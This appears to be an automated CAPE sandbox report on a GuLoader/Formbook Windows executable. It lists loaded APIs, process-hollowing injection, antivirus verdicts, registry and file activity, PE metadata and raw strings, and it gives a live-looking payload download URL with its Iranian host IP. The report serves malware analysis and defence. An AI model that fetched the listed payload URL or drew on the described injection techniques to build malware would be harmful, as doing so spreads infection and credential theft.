DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoInitializeEx
DynamicLoader: cryptbase.dll/SystemFunction036
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/EventWrite
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoCreateInstance
DynamicLoader: IPHLPAPI.DLL/GetAdaptersAddresses
DynamicLoader: WS2_32.dll/GetAddrInfoW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/DllGetClassObject
DynamicLoader: OLEAUT32.dll/DllCanUnloadNow
DynamicLoader: ADVAPI32.dll/RegOpenKeyW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: IPHLPAPI.DLL/ConvertInterfaceGuidToLuid
DynamicLoader: IPHLPAPI.DLL/GetIpForwardTable2
DynamicLoader: IPHLPAPI.DLL/GetIpNetEntry2
DynamicLoader: IPHLPAPI.DLL/FreeMibTable
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/StringFromIID
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoUninitialize
DynamicLoader: OLEAUT32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoSetProxyBlanket
DynamicLoader: ole32.dll/ObjectStublessClient10
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegEnumKeyExW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/DllGetClassObject
DynamicLoader: OLEAUT32.dll/DllCanUnloadNow
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/UnregisterTraceGuids
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
HTTPS urls from behavior.
URL: http://pars-science.ir/colinx_hYnafiCIIe228.bin
CAPE extracted potentially suspicious content
c6Dqqn8fjGAx.exe: Injected PE Image: 32-bit executable
c6Dqqn8fjGAx.exe: Injected Shellcode/Data
c6Dqqn8fjGAx.exe: GuLoader
c6Dqqn8fjGAx.exe: Injected PE Image: 32-bit DLL
c6Dqqn8fjGAx.exe: Unpacked Shellcode
c6Dqqn8fjGAx.exe: Unpacked Shellcode
Queries or connects to DNS-Over-HTTPS/DNS-Over-TLS domain or IP address
ip: 1.1.1.1
Queries or connects to DNS-Over-HTTPS/DNS-Over-TLS domain or IP address
ip: 1.1.1.1
Performs some HTTP requests
url: http://pars-science.ir/colinx_hYnafiCIIe228.bin
Unconventionial language used in binary resources: Catalan
Authenticode signature is invalid
authenticode error: No signature found. SignTool Error File not valid C\Users\Rebecca\AppData\Local\Temp\c6Dqqn8fjGAx
Behavioural detection: Injection (Process Hollowing)
Injection: c6Dqqn8fjGAx.exe(5596) -> c6Dqqn8fjGAx.exe(5848)
Executed a process and injected code into it, probably while unpacking
Injection: c6Dqqn8fjGAx.exe(5596) -> c6Dqqn8fjGAx.exe(5848)
Behavioural detection: Injection (inter-process)
CAPE detected the Formbook malware family
File has been identified by 21 Antiviruses on VirusTotal as malicious
Cylance: Unsafe
Sangfor: Malware
F-Prot: W32/VBKrypt.AMM.gen!Eldorado
Symantec: ML.Attribute.HighConfidence
APEX: Malicious
Kaspersky: Trojan.Win32.Vebzenpak.vsy
Trapmine: malicious.high.ml.score
SentinelOne: DFI - Suspicious PE
Cyren: W32/VBKrypt.AMM.gen!Eldorado
Fortinet: W32/Agent.HKMB!tr
Endgame: malicious (high confidence)
Microsoft: PWS:Win32/Fareit.AB!MTB
ZoneAlarm: Trojan.Win32.Vebzenpak.vsy
McAfee: Fareit-FST!5484FDF0FB3F
Malwarebytes: Trojan.MalPack.VB
ESET-NOD32: a variant of Win32/Injector.EMGX
Rising: Downloader.Guloader!1.C738 (CLASSIC)
Ikarus: Win32.SuspectCrc
eGambit: Unsafe.AI_Score_99%
BitDefenderTheta: Gen:[email protected]
Qihoo-360: Generic/HEUR/QVM03.0.B1EC.Malware.Gen
Attempts to modify proxy settings
Created network traffic indicative of malicious activity
signature: ET JA3 Hash - Possible Malware - Various Malspam/RigEK

Screenshots


Hosts

Direct IP Country Name
N 185.159.153.117 [VT] Iran, Islamic Republic of
Y 1.1.1.1 [VT] Australia

DNS

Name Response Post-Analysis Lookup
pars-science.ir [VT] A 185.159.153.117 [VT] 185.159.153.117 [VT]

Summary

C:\Windows\Globalization\Sorting\sortdefault.nls
\Device\KsecDD
C:\Users\Rebecca\AppData\Local\Temp\c6Dqqn8fjGAx.exe.cfg
C:\Windows\System32\C_932.NLS
C:\Windows\System32\C_949.NLS
C:\Windows\System32\C_950.NLS
C:\Windows\System32\C_936.NLS
C:\Users\Rebecca\AppData\Local\Temp\~DFF51EEFB66773FEBB.TMP
C:\Program Files\Qemu-ga\qemu-ga.exe
C:\Program Files\qga\qga.exe
C:\Windows\System32\msvbvm60.dll
C:\Windows\System32\ntdll.dll
C:\Windows\Globalization\Sorting\sortdefault.nls
\Device\KsecDD
C:\Users\Rebecca\AppData\Local\Temp\~DFF51EEFB66773FEBB.TMP
C:\Program Files\Qemu-ga\qemu-ga.exe
C:\Program Files\qga\qga.exe
C:\Windows\System32\msvbvm60.dll
C:\Windows\System32\ntdll.dll
C:\Users\Rebecca\AppData\Local\Temp\~DFF51EEFB66773FEBB.TMP
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLEAUT
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-US
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-US
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Sorting\Versions\00060101.00060101
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale\Alternate Sorts
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Language Groups
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000409
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1
DisableUserModeCallbackFilter
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\WMR
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager\SafeProcessSearchMode
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Codepage
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\932
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\949
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\950
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\936
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\VBA\Monitors
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLEAUT\UserEra
HKEY_CURRENT_USER
HKEY_CURRENT_USER\Software\Policies\Microsoft\Control Panel\International\Calendars\TwoDigitYearMax
HKEY_CURRENT_USER\Control Panel\International\Calendars\TwoDigitYearMax
HKEY_CURRENT_USER\Software\VB and VBA Program Settings\startbogstavs\Caponized9
HKEY_CURRENT_USER\Software\VB and VBA Program Settings\Tuberculomas\Coatninger
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad
HKEY_CURRENT_USER\Software\Classes
HKEY_CURRENT_USER\Software\Classes\Interface\{26656EAA-54EB-4E6F-8F85-4F0EF901A406}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{26656EAA-54EB-4E6F-8F85-4F0EF901A406}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{26656EAA-54EB-4E6F-8F85-4F0EF901A406}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\Interface\{8A40A45D-055C-4B62-ABD7-6D613E2CEAEC}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{8A40A45D-055C-4B62-ABD7-6D613E2CEAEC}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{8A40A45D-055C-4B62-ABD7-6D613E2CEAEC}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\Interface\{55272A00-42CB-11CE-8135-00AA004BB851}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{55272A00-42CB-11CE-8135-00AA004BB851}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{55272A00-42CB-11CE-8135-00AA004BB851}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocHandler
HKEY_LOCAL_MACHINE\Software\Microsoft\OleAut
HKEY_CURRENT_USER\Software\Classes\Interface\{BCD1DE7E-2DB1-418B-B047-4A74E101F8C1}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{BCD1DE7E-2DB1-418B-B047-4A74E101F8C1}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{BCD1DE7E-2DB1-418B-B047-4A74E101F8C1}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\Interface\{2A1C9EB2-DF62-4154-B800-63278FCB8037}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{2A1C9EB2-DF62-4154-B800-63278FCB8037}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{2A1C9EB2-DF62-4154-B800-63278FCB8037}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}\WpadDecision
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}\WpadDecisionTime
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadExpirationDays
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}\WpadDecisionReason
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}\WpadDhcp
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}\WpadDns
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}\WpadDetectedUrl
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDecision
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDecisionTime
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDecisionReason
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDhcp
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDns
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDetectedUrl
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}\52-54-00-6f-d4-05
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}\WpadNetworkName
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-US
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-US
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Sorting\Versions\00060101.00060101
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000409
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1
DisableUserModeCallbackFilter
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager\SafeProcessSearchMode
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\932
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\949
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\950
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\936
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{26656EAA-54EB-4E6F-8F85-4F0EF901A406}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{8A40A45D-055C-4B62-ABD7-6D613E2CEAEC}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{55272A00-42CB-11CE-8135-00AA004BB851}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{BCD1DE7E-2DB1-418B-B047-4A74E101F8C1}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{2A1C9EB2-DF62-4154-B800-63278FCB8037}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}\WpadDecision
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}\WpadDecisionTime
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadExpirationDays
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}\WpadDecisionReason
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}\WpadDhcp
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}\WpadDns
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}\WpadDetectedUrl
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDecision
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDecisionTime
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDecisionReason
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDhcp
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDns
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDetectedUrl
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDecisionReason
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDecisionTime
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDecision
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDetectedUrl
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}\WpadDecisionReason
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}\WpadDecisionTime
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}\WpadDecision
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}\WpadNetworkName
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}\WpadDetectedUrl
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDetectedUrl
kernel32.dll.IsProcessorFeaturePresent
kernel32.dll.SortGetHandle
kernel32.dll.SortCloseHandle
cryptbase.dll.SystemFunction036
oleaut32.dll.OleLoadPictureEx
oleaut32.dll.DispCallFunc
oleaut32.dll.LoadTypeLibEx
oleaut32.dll.UnRegisterTypeLib
oleaut32.dll.CreateTypeLib2
oleaut32.dll.VarDateFromUdate
oleaut32.dll.VarUdateFromDate
oleaut32.dll.GetAltMonthNames
oleaut32.dll.VarNumFromParseNum
oleaut32.dll.VarParseNumFromStr
oleaut32.dll.VarDecFromR4
oleaut32.dll.VarDecFromR8
oleaut32.dll.VarDecFromDate
oleaut32.dll.VarDecFromI4
oleaut32.dll.VarDecFromCy
oleaut32.dll.VarR4FromDec
oleaut32.dll.GetRecordInfoFromTypeInfo
oleaut32.dll.GetRecordInfoFromGuids
oleaut32.dll.SafeArrayGetRecordInfo
oleaut32.dll.SafeArraySetRecordInfo
oleaut32.dll.SafeArrayGetIID
oleaut32.dll.SafeArraySetIID
oleaut32.dll.SafeArrayCopyData
oleaut32.dll.SafeArrayAllocDescriptorEx
oleaut32.dll.SafeArrayCreateEx
oleaut32.dll.VarFormat
oleaut32.dll.VarFormatDateTime
oleaut32.dll.VarFormatNumber
oleaut32.dll.VarFormatPercent
oleaut32.dll.VarFormatCurrency
oleaut32.dll.VarWeekdayName
oleaut32.dll.VarMonthName
oleaut32.dll.VarAdd
oleaut32.dll.VarAnd
oleaut32.dll.VarCat
oleaut32.dll.VarDiv
oleaut32.dll.VarEqv
oleaut32.dll.VarIdiv
oleaut32.dll.VarImp
oleaut32.dll.VarMod
oleaut32.dll.VarMul
oleaut32.dll.VarOr
oleaut32.dll.VarPow
oleaut32.dll.VarSub
oleaut32.dll.VarXor
oleaut32.dll.VarAbs
oleaut32.dll.VarFix
oleaut32.dll.VarInt
oleaut32.dll.VarNeg
oleaut32.dll.VarNot
oleaut32.dll.VarRound
oleaut32.dll.VarCmp
oleaut32.dll.VarDecAdd
oleaut32.dll.VarDecCmp
oleaut32.dll.VarBstrCat
oleaut32.dll.VarCyMulI4
oleaut32.dll.VarBstrCmp
ole32.dll.CoCreateInstanceEx
ole32.dll.CLSIDFromProgIDEx
sxs.dll.SxsOleAut32MapIIDOrCLSIDToTypeLibrary
user32.dll.GetSystemMetrics
user32.dll.MonitorFromWindow
user32.dll.MonitorFromRect
user32.dll.MonitorFromPoint
user32.dll.EnumDisplayMonitors
user32.dll.GetMonitorInfoA
asycfilt.dll.FilterCreateInstance
cryptsp.dll.CryptAcquireContextW
cryptsp.dll.CryptGenRandom
kernel32.dll.NlsGetCacheUpdateCount
version.dll.VerQueryValueA
version.dll.GetFileVersionInfoSizeA
version.dll.GetFileVersionInfoA
kernel32.dll.GetCalendarInfoW
ws2_32.dll.#23
ws2_32.dll.#21
ws2_32.dll.WSAIoctl
ws2_32.dll.#3
ws2_32.dll.#116
iphlpapi.dll.NotifyIpInterfaceChange
iphlpapi.dll.NotifyUnicastIpAddressChange
api-ms-win-downlevel-ole32-l1-1-0.dll.CoInitializeEx
api-ms-win-downlevel-advapi32-l1-1-0.dll.EventWrite
api-ms-win-downlevel-ole32-l1-1-0.dll.CoCreateInstance
iphlpapi.dll.GetAdaptersAddresses
ws2_32.dll.GetAddrInfoW
oleaut32.dll.#8
oleaut32.dll.#9
oleaut32.dll.DllGetClassObject
oleaut32.dll.DllCanUnloadNow
advapi32.dll.RegOpenKeyW
iphlpapi.dll.ConvertInterfaceGuidToLuid
iphlpapi.dll.GetIpForwardTable2
iphlpapi.dll.GetIpNetEntry2
iphlpapi.dll.FreeMibTable
api-ms-win-downlevel-ole32-l1-1-0.dll.StringFromIID
api-ms-win-downlevel-ole32-l1-1-0.dll.CoUninitialize
oleaut32.dll.#500
ws2_32.dll.#5
api-ms-win-downlevel-ole32-l1-1-0.dll.CoSetProxyBlanket
ole32.dll.ObjectStublessClient10
oleaut32.dll.#2
ole32.dll.CoTaskMemFree
api-ms-win-downlevel-advapi32-l1-1-0.dll.RegEnumKeyExW
oleaut32.dll.#6
api-ms-win-downlevel-advapi32-l1-1-0.dll.UnregisterTraceGuids
cryptsp.dll.CryptReleaseContext
"C:\Users\Rebecca\AppData\Local\Temp\c6Dqqn8fjGAx.exe"

BinGraph Download graph

PE Information

Image Base Entry Point Reported Checksum Actual Checksum Minimum OS Version Compile Time Import Hash Icon Icon Exact Hash Icon Similarity Hash
0x00400000 0x004014c8 0x000195b1 0x000195b1 4.0 2016-04-21 00:38:38 3c02d8e5dd5f628bf90e285220bc8028 7bcfdfd048785434cec7bf7208eb23a9 48ba5c06919089aab0a04972471cfee1

Sections

Name RAW Address Virtual Address Virtual Size Size of Raw Data Characteristics Entropy
.text 0x00001000 0x00001000 0x0000f070 0x00010000 IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ 6.76
.data 0x00011000 0x00011000 0x00000e8c 0x00001000 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE 0.00
.rsrc 0x00012000 0x00012000 0x000015a8 0x00002000 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ 3.11

Resources

Name Offset Size Language Sub-language Entropy File type
RT_ICON 0x000123f0 0x00000ea8 LANG_NEUTRAL SUBLANG_NEUTRAL 4.04 None
RT_ICON 0x000123f0 0x00000ea8 LANG_NEUTRAL SUBLANG_NEUTRAL 4.04 None
RT_ICON 0x000123f0 0x00000ea8 LANG_NEUTRAL SUBLANG_NEUTRAL 4.04 None
RT_GROUP_ICON 0x000123c0 0x00000030 LANG_NEUTRAL SUBLANG_NEUTRAL 3.07 None
RT_VERSION 0x00012150 0x00000270 LANG_CATALAN SUBLANG_DEFAULT 3.22 None

Imports

0x401000 None
0x401004 None
0x401008 _CIcos
0x40100c _adj_fptan
0x401010 __vbaVarMove
0x401014 __vbaFreeVar
0x401018 __vbaStrVarMove
0x40101c __vbaFreeVarList
0x401020 _adj_fdiv_m64
0x401024 None
0x401028 __vbaFreeObjList
0x40102c None
0x401030 _adj_fprem1
0x401034 __vbaStrCat
0x401038 None
0x40103c None
0x401044 None
0x401048 _adj_fdiv_m32
0x40104c None
0x401050 None
0x401054 None
0x401058 __vbaObjSet
0x40105c _adj_fdiv_m16i
0x401060 _adj_fdivr_m16i
0x401064 None
0x401068 __vbaFpR8
0x40106c _CIsin
0x401070 __vbaChkstk
0x401074 EVENT_SINK_AddRef
0x401078 None
0x40107c __vbaStrCmp
0x401080 __vbaVarTstEq
0x401084 None
0x401088 None
0x40108c None
0x401090 None
0x401094 __vbaCastObjVar
0x401098 None
0x40109c _adj_fpatan
0x4010a0 None
0x4010a4 EVENT_SINK_Release
0x4010a8 __vbaUI1I2
0x4010ac _CIsqrt
0x4010b4 __vbaExceptHandler
0x4010b8 None
0x4010bc _adj_fprem
0x4010c0 _adj_fdivr_m64
0x4010c4 None
0x4010c8 None
0x4010cc __vbaFPException
0x4010d0 None
0x4010d4 _CIlog
0x4010d8 __vbaNew2
0x4010dc _adj_fdiv_m32i
0x4010e0 _adj_fdivr_m32i
0x4010e4 __vbaStrCopy
0x4010e8 __vbaFreeStrList
0x4010ec None
0x4010f0 _adj_fdivr_m32
0x4010f4 _adj_fdiv_r
0x4010f8 None
0x4010fc None
0x401100 None
0x401104 None
0x401108 __vbaVarDup
0x40110c None
0x401114 _CIatan
0x401118 __vbaStrMove
0x40111c __vbaUI1Str
0x401120 None
0x401124 _allmul
0x401128 None
0x40112c _CItan
0x401130 None
0x401134 None
0x401138 _CIexp
0x40113c __vbaFreeStr
0x401140 __vbaFreeObj

!This program cannot be run in DOS mode.
.text
`.data
.rsrc
MSVBVM60.DLL
Uslebnekrnkel
Paddek
Antip
"Exif
%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
O\mSTXZf
hmq{io
oj>ojtq
I%I$~Y
I+N;?
~oje^
Eu3X[
`O:d_
9>V|}
SE[[{
T.dY.
Q[ky6
ui.ty
x~I4[VY
>|WIk
'q$2-
Yl4H.
8~&|O
2[]\/
=RFy<
Kvi7o
H$_5S
sm#mm
Gc}ukoy
Z+}V%m
w7:dPf
:*elu
TeR[H
@eR[O
@ehwPB
*ehuA
&\^jS
@5huD
@eR[H
H2|aQe
@eSXPe
@5kjx
5|ZMe
*ekOl
=hhuE
@eTj9
y.[Zk
q:d?I&
q:d?I&
kkda|
-,jCj
G&'S[S
vljCj
Kj#Q$
~ZQ/S
._6I%
<Egyu&
[=Yn5H
huKth
k?/t?=:
}t7^e
<Qqmk2
y$k$v
3-tS1
i4=SZ
DRKq/
8Ws=~
y.#o>T
x~I?w
_5[sm
kK]>YW~
Coq,s
U~_)~o
x^7I7,
]I4}/P
x]y_:
333333334
%),//,)$
6-*1H
>ABFL
Antip
Check1
preadjectiv
Graciosos4
Option3
Sumnerindsn1
Option2
ATTLEMAR
Option1
Line2
Line1
VB5!6&*
Tanacetonec7
Uslebnekrnkel
Uslebnekrnkel
Uslebnekrnkel
Paddek
GADARE
Allerinder
POTGUTRE
Anthropop9
Gudsf4
LAMPISTERICA
Afblankhundr1
Fejlfindin3
flourlike
Undeceive7
Plump7
s(Cv:O
C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
ATTLEMAR
Graciosos4
Check1
Sumnerindsn1
LYNNEDSLAGENE
kneeing
